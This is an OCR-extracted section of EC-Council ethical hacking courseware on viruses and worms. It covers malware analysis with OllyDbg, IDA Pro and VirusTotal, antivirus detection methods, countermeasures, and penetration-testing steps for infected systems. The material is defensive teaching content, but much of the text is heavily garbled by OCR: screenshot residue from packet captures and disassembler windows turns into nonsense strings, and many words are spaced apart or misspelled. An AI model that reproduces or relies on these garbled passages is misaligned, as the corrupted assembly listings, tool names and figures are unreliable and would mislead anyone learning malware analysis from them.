Delete |1 ^) Event Detail | Protocol ^ ^ ^ ^ ^ 8 ^ Web Web Web Web Web Web IH Web Web Web ^ W ^ Web Web Web Web Party A WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... Port A 1076 1104 1109 1110 1111 1114 1114 1145 1147 1163 1114 1164 1076 1205 U Party B mystarHon.1... maa03s04-n... maa03s04in... maa03s04-tn... maa03s04-in... maa03s04in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... mystart-ton.i... maa03s04-in... Port B 80 443 443 443 443 80 80 80 443 443 80 80 80
Last Updated 10/5/2012 2:14:3.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:15:0.. 10/5/2012 2:15:2..
0 S H 0 1 B
10/5/2012
0 4 * ) Web 0 2 0
I w t D d i i __________________________________________
S' ' ' ) I I I r j L^j More... *
PO ST r e q u e s t to h ttp : //n e w s .g o o g ! e .c o .in /n e w s /x h r /r h c ? a u th u s e r = 0
Tag cid
Value
52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614
J ___________________________________________________
180 bytes [ Q Connected \~ T \ 1,067,459
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
a l w a r e
A n a l y s i s
P r o c e d u r e (C ontd)
( |
^ H
(rtifW d itbiul N m Im
7. Collect the following information using debugging tools such as OllyDbg and ProcDump: Service requests Attempts for incoming and outgoing connections DNS tables information
M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t d )
Step 7: Collect the follow ing inform ation using debugging tools such as O llyD bg and ProcDump: Service requests A tte m pts for incom ing and outgoing connections 0
1
O lly D b g
Source: http://w ww .ollydbg.de
OllyDbg is a 32-bit assem bler-level analyzing debugger for M icrosoft W in d o w s Emphasis on binary code analysis makes it particularly useful in cases w here source is unavailable.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
V k*
Debug
Plugins no.
Options
Window
Hdp
L k l]
gMsL ! W 4 0 l0 \<
0O 4O 109A
E C X .9 C PU SH E C X 3 l L J ^ P . (K E R N E L 3 2 . G t t P r 0 c s 1 M t 4 0 >
vm
jMnw
h a mmam
C c u . <JM P . ( K E R N E L 3 2 . H c A 1 lo> OP E A X .E A X SHORT O L L Y O 0 6 .0 0 4 0 1 0 0 6 nou e a x . o fo C A L L O L L V O 6 6 .0 O 4 0 1 0 6 C PU SH E A X PU SH E A X PU SH DUORO PT R OS* 14001 ISO C A L L 0 L L V 0 8 G .0 0 4 0 0 3 0 4 PUSH DMORO PT R O S t (4 0 0 1 1 0 3 C A L L O L L V O 0 O .0 0 4 A 0 3 E 8 POP E01 RETN W J E C X .9 C OR E C X .E C X J E SHORT O LLV O CC. 0 0 4 0 1 0 P 2 C A L L O LL V 0 8G .0 O 4 A O 3 A C flOL OUOPO PT R O S; [ 4 0 0 1 1 0 3 . E A X E A X .0 JN B SHORT 0 L L V D 8 & .0 0 4 0 1 0 7 9 0U E A X .0 F C C A L L O L L V 0 8 G .0 0 4 0 1 06C RETN C P OMORO P T R O S* [ 4 0 0 1 1 0 3 . 0 J SHORT X L V 0 6 6 . 0 0 4 0 1 124 PUSH [*O RO PT R OS: [4 0 0 1 1 6 3 C A L L Q LL V 0 6 G .0 0 4 H 0 3 C 4 OR E A X .E A X JE SHORT 0 L L V 0 8 G . 0 0 4 0 1 1 2 4 PU SH E A X PU SH 0 C A L L < J H P .(K E R N E L 3 2 . G ttP r o c f tf t H c PU SH ER X C A L L <J M P .t :E K H E L 3 2 .H * c f >
[
r
H440S1Z s> X
f iw
C G t P r o e * t H 4e
: M EPP_iER0_r^nd
(1 5 6 .1 .
j __
ECX oooooooo
COX 0 M 9 I 0 M OLL'.CGO.<rvcxdw l E r t r y P o in t > E B X 7FA9O0OO ESP 0 0 1 8 FF 8 8
kltoao
H t a o A lt o e
IA ral =0 0 0 0 0 0 0 0
O LLV T O G . 0 04 A 0 3O 4
ES CS SS OS FS GS
32b i t 3 2 b lt 32b I t 3 2 b it 3 2 b it 3 2 b it
EftftOR_ttCO_NOT_FOUNO <000000?E>
E F . 00000244 N 0 .f .E .B .N S .P .G E .L E i
LO U .V O 0 6 .0 O 4 A O 3 C 4
3 2 1 0 C oftd 0 0 0 0 P*< N E A P ,S 3
Err
r1 * * k 11 11 1t
E S P U 0 Z 0 I 0 0 0 0 0 0 0 0
rc-:! >
I****"
RETURN t o
O 01 8 FF 0 C
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
V i r u s
A n a l y s i s T o o l: ID A
P r o
C E H
U rt> fW 4 ttfciul N m Im
h ttp : //w w w .h e x r a y s .c o m
Copyright by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.
V iru s A n a ly s is T o o l: ID A P ro
Source: http://www.hex-rays.com This is a dissem bler and debugger tool that supports both W in d o w s and Linux platforms.
D isse m b le r
The dissem bler displays the instruction execution of various programs in symbolic form, even if the code is available in a binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro Tool reveals this immediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary codes. These are displayed in readable execution maps.
D ebugger
The debugger is an interactive tool that com plem ents the dissem bler to perform the task of static analysis in one single step. It bypasses the obfuscation process, which helps the assem bler to process the hostile code in-depth.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
IDA Pro is a tool that allows you to explore any software interruptions and vulnerabilities and to use it as tam pe r resistance. It is an interactive, programmable, m ulti-processor disassembler coupled to a local and rem ote debugger and augmented by a com plete plugin programm ing environment. This can also be used to protect your essential privacy rights. This is used by antivirus companies, research companies, software de ve lopm e nt companies, agencies, and military organizations.
IDA - C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe
File Edit Jump Search View Debuggei Options Windows Help
~ I I * B
111
171 Finctxms wndow Function name sub_401070 sub.401200 sub.401230 sub_4012F0 sub_4O13A0 sub.4015A0 sub_402EA0 $ub.402EC0 sub_403140 sub_403330 sub.403500 sub.403680 sub.403900 sub.403920 j IDA View-A Q | | g ] Hex View-A | ft] Structures I QS Enure_____ | 1*5 Iniports
Line 2 of 944
[g *O u tp u tw n d o w
C om piling file 'C :\Program Files (x86)\ID AD e m o 6.3\idc\ida.idc'... Executing function Min. . . Coapiling file *C :\P rogran1 Files (x8>\ID AD e sa 6.3\idc\onload. idc'... executing function 'O n L oad ' ID Aia analysing the input file... Y o um a y start to explore the input file right n ow . U sing F L IR T signature: M icrosoft V isualC 2-10/net runt
1
sub.403960 sub_403A40 sub 403B30
u a r_ C = d w o rd p t r -OCh u a r_ 8 = d u o rd p t r -8 o a r ^ ' d w o rd p t r -<* h In s ta n c e - d u o rd p t r < 1 h P r e u I n s t a n c e - d w o rd p t r lp C n d L in e - d u o r d p t r OCh n S h o w C n d- d w o rd p t r 10h e s p , 18h e a x , [ e s p 1 8 h u a r _ 1 i] eax OFFFFFFFFh d s :G e tC o n n a n d L in e W eax e c x , [e s p Z < ih u a r_ 1 0 ] ecx d s :? fro n W C h a rftrra y 0 Q S trin g 0 Q T B B S fl? ftU 1 2 0 P B G H 0 2 ; QT: : Q S t r i n g : : F r o m W C h a r A r r a y ( u s h o r t c o n s t e s p , OCh e c x , eax d s :? to L o c a l8 B itB Q S trin g 6 Q T B B Q B E ? A U Q B y te A rra y Q 2 Q X Z ; Q T: : Q S t r i n g : : t o L o c a l 8 B i t ( u o i d ) e d x , [e s p * 1 8 h * u a r_ 1 0 ]
nrcccccccH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
::
r V E H
tttK 4l IU (h M
M VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.
3 Antfwus ia n for fbili C 1 ft Itips: 'vk'^w.virustotaLconn ' e/C5'5'd625c39d3d5d9l041b9720a30c2fb1e757e603695d3478687c27c392fdt.an.aly$s^Statistics DocantflUlidn FAQ About Join our community Sign =
Community
m
1
&
i r u
total *K
0 ^ 0
SHA2&6
&
r i r u ! t o
M u m m l!* (* *1 2 V B
hi 2 , . . . n V
Kutulf WifiTrojarvMMueker 1036288 BOCWm m x m 23 G1 Bac*(*oorW1n.32 MoSuckei gen Win32 Tro!an-gen Bac Coor Mmuc kw
Avast AVG
|p 5 |
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of m a lw a re de tected by antivirus engines. Features: 0 0 0 0 0 Free and independent service Uses multiple antivirus engines Com prised of real-time autom atic updates of virus signatures Gives detailed results from each antivirus engine Has real-time global statistics
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
- <
C i *P ^0 ^ 0 //0 6 (>5 > > > 1 > 1 < 4 9 7 ;0 0 }^(^7 * ( > 1 4 7 6 *7 > 2 7 )/%^0
3 /iru! t o t a l
S! /iru s to ta l
MwnumMtwt 3JMB
^ **
*N * 0 0
'.Vinrre aaMdm ic 2 8 8 )103 OOCMotutM 2 Ol mfray snt*t tok * i a URL or starch thrtugh th* /ruTc d Bacl1ioor> W n32 MoSucktf g v<
W W 2T r 0 |J0 9 * n
BactOooi M1ucM
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
O n lin e
M a lw a r e A n a ly s is
,
ltfc.nl M m hat
C p VI T YT X l /tp Q f j ^ v T O
Metascan Online
h ttp ://w w w . metascan-online, com
Bitdefender QuickScan
h ttp ://w w w . bitdefender. com
GFI SandBox
h ttp ://w w w . gfi. com
> ___ j
ThreatExpert
h ttp ://w w w . threatexpert.com
UploadMalware.com
h ttp ://w w w . uploadmalware. com
Fortinet
h ttp ://w w w .fo rtig u ard . com
O n lin e M a lw a re A n a ly s is S e rv ic e s
( J ___ I Online m alware analysis services allow you to scan files and resources and secure them before attackers attack and c o m p ro m is e them. A few online m alware analysis services are listed as follows: 0 0 0 0 0 0 0 0 0 0 Anubis: Analyzing U nknown Binaries available at http://anubis.iseclab.org Avast! Online Scanner available at http://onlinescan.avast.com M a lw are Protection Center available at https://w ww .m icrosoft.com ThreatExpert available at http://w w w .threatexpert.com Dr. W e b Online Scanners available at http://vm s.drweb.com Metascan Online available at http://w w w .m etascan-online.com Bitdefender QuickScan available at http://w w w .bitdefender.com GFI SandBox available at http://www.gfi.com U p loa d M a lw are.com available at http://w w w .uploadm alw are.com Fortinet available at http://ww w.fortiguard.com
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o d u l e
F l o w
C E H
T ypes of V iru s e s
C o m p u te r W o rm s
M a lw a r e A n a ly s is
M o d u le F lo w
So far, w e have discussed various viruses and w orm s and m alware analysis. N ow we will discuss the counterm easures to be applied to protect against viruses and worms, if any are found. These counterm easures help in enhancing security.
M a lw a r e Analysis
Types o f Viruses
Counterm e a sures
C o m p u te r W o rm s
P e ne tratio n Testing
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
i r u s
e t e c t i o n
e t h o d s
C E H
S can n in g
In te g rity C h eck in g
In te rc e p tio n
Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the
Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors
The interceptor monitors the operating system requests that are written to the disk
V iru s D e te c tio n M e th o d s
A virus scanner is an im portant piece of software that one should have installed on the PC. If there is no scanner, there is high chance that the system can be hit by and suffer from a virus. A virus p ro te c to r should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. A n tiviru s so ftw a re is of no use if it does not know w hat to look for in the latest virus. One should always re m e m be r that an antivirus program cannot stop everything. The rule of thum b is if an email looks like a suspicious one, e.g., if one is not expecting an email from the sender or does not know the sender or if the header looks like som ething that a known sender w ould not norm ally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The M y D o o m and W 3 2 .N o v a rg .A @ m m w orm s infected many Internet users recently. These w orm s infected most users through email. The three best m ethods for antivirus detection are: Scanning Q Integrity checking
Interception In addition, a com bination of som e of these techniques can be m ore effective.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S c a n n in g
Q The m om ent a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus). The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search m e m ory files and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected. 0 Virus writers often create many new viruses by altering the existing one. W ha t looks like a new virus, may have taken just a few minutes to be created. A tta ck e rs make these changes frequently to throw off the scanners. In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file. In another possibility, the scanner sets up a virtual com puter in the RA M and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and rem ove messages that might contain a c om pute r virus or other unwanted content. e The major advantages of scanners are: They can check programs before they are executed. Q Q It is the easiest way to check new software for any known or m alicious virus.
The major drawbacks to scanners are: Q Old scanners could prove to be unreliable. W ith the trem endous increase in new viruses old scanners can quickly becom e obsolete. It is best to use the latest scanners available on the market. Q Even a new scanner is never eq u ip p e d to handle all new challenges, since viruses appear m ore rapidly than new scanners can be developed to battle them.
In te g rity C h e c k in g
0 Integrity checking products perform their functions by reading and recording integrated data to develop a signature or base line for those files and system sectors. Q Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the a m ount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A disadvantage of a basic integrity checker is that it cannot differentiate file c o rruption caused by a bug from corruption caused by a virus.
However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers com bine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.
In te rc e p tio n
0 Q The main use of an interceptor is for deflecting logic bom bs and Trojans. The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct instructions for input and output instructions by the virus. In some cases, the virus is capable of disabling the m on ito rin g program itself. Some years back it took only eight bytes of code for a w idely used antivirus program to turn off its m onitoring functions.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
V iru s a n d W o rm s C o u n te rm e a s u re s
C E H
Install anti-virus software that detects and removes infections as they appear
Generate an anti-virus policy for safe computing and distribute it to the staff
Pay attention to the instructions while downloading files or any programs from the Internet
Update the anti-virus software regularly Avoid opening the attachments received from an unknown sender as viruses spread via e-mail attachments Possibility of virus infection may corrupt data, thus regularly maintain data back up
Schedule regular scans for all drives after the installation of anti-virus software Do not accept disks or programs without checking them first using a current version of an antivirus program
V iru s a n d W o rm s C o u n te r m e a s u r e s
Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be m inim ized. Some of these m ethods include: 0 0 Install antivirus software that detects and removes infections as they appear Generate an antivirus policy for safe co m p u tin g and distribute it to the staff Pay attention to the instructions while d o w n lo a d in g files or any programs Internet 0 Update the antivirus softw a re on the a m onthly basis, so that it can identify and clean out new bugs 0 Avoid opening the attachm ents received from an unknow n sender as viruses spread via email attachm ents 0 0 0 Possibility of virus infection may corrupt data, thus regularly maintain data back up Schedule regular scans for all drives after the installation of antivirus software Do not accept disks or program s w ithou t checking them first using acurrent version of an antivirus program from the
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
V iru s a n d W o rm s C o u n te rm e a s u re s
(Cont'd)
E H
Run disk clean up, registry scanner and defragmentation once a week
Block the files with more than one file type extension
Q W
Be cautious with the files being sent through the instant messenger
^1
V i r u s a n d W o r m s C o u n t e r m e a s u r e s ( C o n t d )
0 0 0 0 0 0 0 0 0 0 Ensure the executable code sent to the organization is approved Run disk clean up, registry scanner, and d e fra g m en ta tio n once a w eek Do not boot the machine with infected b o o ta b le system disk Turn on the firewall if the OS used is W indow s XP Keep inform ed about the latest virus threats Run anti-spyw are or adw are once in a w eek Check the DVDs and CDs for virus infection Block the files with m ore than one file type extension Ensure the pop-up blocker is turned on and use an Internet firew all Be cautious w ith the files being sent through the instant messenger
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p a n io n
A n tiv iru s : I m m u n e t
C E H
Im m u n e t1
A Community! < 2 I1M ycom m unity
| -o l t I G re p h IM otires || t-njneiC o T i-n iritrN o fic e s
Community
2.478,268 people protected
Computerl
2 0 2
Product
f 'rr1o rP fn -ri
Sum m ary 1D tU le d H fc to ry
( C u e ra -^ v * J ) j
Immunet 1
P 9 * V C C t >
^Ijilf
Scan
Scan Complete
Res Seamed: Threars Defected: Threats Removed: llapsed lime: Yow Kjn hconvi*1 K l. Threat* wwe detected and jc U a n * c 203228 306 396 0:4:49
10 y s /2 0 12 6 :* s :s 0 P w
Ia* st sranrK vl
Maximize Y
Uoorade to immunet Plus 3.0 and you wtH recave: ^ AntMrusiAnawywaco Email Da'jbaw Sunt I iy Advanced RootkitRemoval Enhanced Comota Th d Br *offline protection Technical Suppot I
^ J TaT
Scan History |
C o m p a n io n A n tiv iru s: I m m u n e t
Source: h ttp://w w w .im m u net.com Com panion Antivirus means that Im m unet is com patible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are under protected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protects detection pow er relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides p ro te ction w hen not connected to the Internet.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
ImmunGtlO
$d ,
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
n t i - v i r u s
T o o l s
C E H
Urt 1fw< ilhiul lUtbM
AVG Antivirus
h ttp ://fre e . avg. com
F-Secure Anti-Virus
http://ww w.fsecure, com
BitDefender
h ttp ://w w w . bit defender, com
N i
Kaspersky Anti-Virus
' 12/ . h ttp://w w w .kaspersky.com
E
!y 9 |
Norton AntiVirus
h ttp ://w w w . s ymantec. com
A n tiv iru s T o o ls
Antivirus tools prevent, detect, and rem ove viruses and other m alicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these to o ls m o n ito r the netw ork's traffic for m alicious activities. A few antivirus tools that can be used for the purpose of detecting and killing the viruses in the systems are listed as follows: 0 0 0 0 0 0 0 0 0 0 AVG Antivirus available at http://free.avg.com BitDefender available at http://w w w .bitdefender.com Kaspersky Anti-Virus available at http://www.kaspersky.com Trend M ic ro Internet Security Pro available at http://apac.trendm icro.com Norton Anti-Virus available at http://w ww .svm antec.com F-Secure Anti-Virus available at http://www.f-secure.com Avast Pro Antivirus available at http://www.avast.com M c A fe e Anti-Virus Plus 2013 available at http://hom e.m cafee.com ESET Smart Security 5 available at http://www .eset.com Total Defense Internet Security Suite available at http://w w w .totaldefense.com
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o d u l e
F l o w
C E H
T ypes of V iru s e s
C o m p u te r W o rm s
C o u n te r m e a su re s
M a lw a r e A n a ly s is
M o d u le F lo w
Penetration testing must be conducted against viruses and worms, as they are the most w idely used means of attack. They do not require extensive k now le dge to use. Hence, you should conduct pen testing on your system or netw ork before a real attacker exploits it
M a lw a r e Analysis
Types o f Viruses
Coun te rm e a su re s
C o m p u te r W o rm s
^ Z )P e n etratio n Testing
This section provides insight into virus and w orm pen testing.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
P e n e t r a t i o n
T e s t i n g
f o r V i r u s
C E H
Install an anti-virus program on the network infrastructure and on the end-user's system Update the anti-virus software to update your virus database of the newly identified viruses Scan the system for viruses, which helps to repair damage or delete files infected with viruses
v
i\
V IR U S
P e n e t r a t i o n
T e s t i n g
f o r V i r u s (C ontd)
C E H
Virus is removed?
>
System is safe
IX
Set the anti-virus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible or delete them if not Ifth e virus is not removed then go to safe mode and delete the infected file manually
P e n e t r a t i o n T e s t i n g f o r V i r u s e s ( C o n t d )
Step4: Set the antivirus to qu a ra n tin e or delete the virus Set your antivirus software to com pare file contents with the known c om puter virus signatures, identify infected files, qu a ra n tine and repair them if possible, or delete them if not. Step5: Go to safe m o d e and delete the infected file m anu a lly Ifthe virus is not removed, then go to safe m ode and delete the infected file manually.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
P e n e t r a t i o n
T e s t i n g
f o r V i r u s (C ontd)
9
UrtifM
H | tU tk m
itkiul
Scan th e system fo r ru n n in g processes, registry e ntries, sta rtu p program s, file s and fo ld e rs in te g rity and services
If a ny suspicious process, registry entry, s ta rtu p program o r service is discovered, check th e associated e x e c u ta b le files
Check th e s ta rtu p program s and d e te rm in e if all th e program s in th e list can be recognized w ith know n fu n c tio n a litie s
Check th e data files fo r m o d ific a tio n o r m a n ip u la tio n by o p e ning several files and com p a rin g hash value o f th e se files w ith a p re -c o m p u te d hash
<
P e n e t r a t i o n T e s t i n g f o r V i r u s e s ( C o n t d )
Step 6: Scan the system fo r running processes You should scan your system for suspicious running process. You can do this by using tools such as W hat's Running, HijackThis, etc. Step7: Scan the system fo r suspicious registry entries You should scan your system for suspicious registry entries. You can do this by using tools such as JV P o w e r Tools and RegShot. Step8: Scan the system fo r W in d o w s services You should scan suspicious W in d o w s services running on your system. You can do this by using tools such as S rv M a n and ServiW in. Step9: Scan the system fo r startup program s You should scan your system for suspicious startup program s running on your system. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs. Step 10: Scan the system fo r files and fo lders integrity You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
P e n e t r a t i o n
T e s t i n g
f o r V i r u s (C ontd)
0 Check the critical OS file modification or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy Document all your findings in previous steps; it helps in determining the next action if viruses are identified in the system Isolate infected system from the network im mediately to prevent further infection Sanitize the complete system for viruses using an updated anti-virus
v
Document all the findings
8 t)
P e n e t r a t i o n T e s t i n g f o r V i r u s e s ( C o n t d )
Step 11: Scan the system fo r critical OS m od ificatio n s You can scan critical OS file m odifications or m anipulation using tools such as TRIPWIRE or manually com paring hash values if you have a backup copy. Step 12: D o cu m e n t all findings These findings can help you determ ine the next action if viruses are identified on the system. S te p l3 : Isolate the infected system Once an infected system is identified, you should isolate the infected system from the netw ork im m ediately in order to pre ve nt further infection. S te p l4 : Sanitize the c o m p le te infected system You should rem ove virus infections from your system by using the latest updated antivirus software.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o d u l e
S u m
a r y
| 0
Virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes whereas worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre determine logical circumstance is met Viruses are categorized according to file they infect and the way they work Lifecycle of virus and worms include designing, replication, launching, detection, incorporation and elimination stages Computer gets infected by Virus, worms and other malware due to not running the latest anti-virus application, not updating and not installing new versions of plug-ins, installing the pirated software, opening the infected e-mail attachments or downloading files without checking properly for the source Several virus and worm development kits such as JPS Virus Maker are available in wild that can be used create malware without any technical knowledge Virus detection methods include system scanning, file integrity checking and monitoring OS requests Virus and worm countermeasures include installing anti-virus software and following anti-virus policy for safe computing
M o d u le S u m m a ry
A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas w orm s are malicious programs that replicate, execute, and spread across the n e tw o rk conne ctio ns independently w ithout human interaction. Some viruses affect com puters as soon as their code is executed; other viruses lie dorm ant until a p re -de te rm in e d logical circum stance is met. Viruses are categorized according to file they infect and the way they work. The lifecycle of virus and w orm s include designing, replication, launching, detection, incorporation, and e lim in a tio n stages. A c om puter gets infected by viruses, worms, and other m alware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or dow nloading files w ithout checking p ro pe rly for the source. Several virus and w orm d e v e lo p m e n t kits such as JPS Virus M a k e r are available in the wild that can be used create m alware w ithou t any technical knowledge.
Module 07 Page 1 1 1 0
Virus
detection
m ethods
include
system
scanning,
file
integrity
checking,
and
m onitoring OS requests. Virus and w orm counte rm e a sures include installing antivirus software and following antivirus policies for safe computing.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.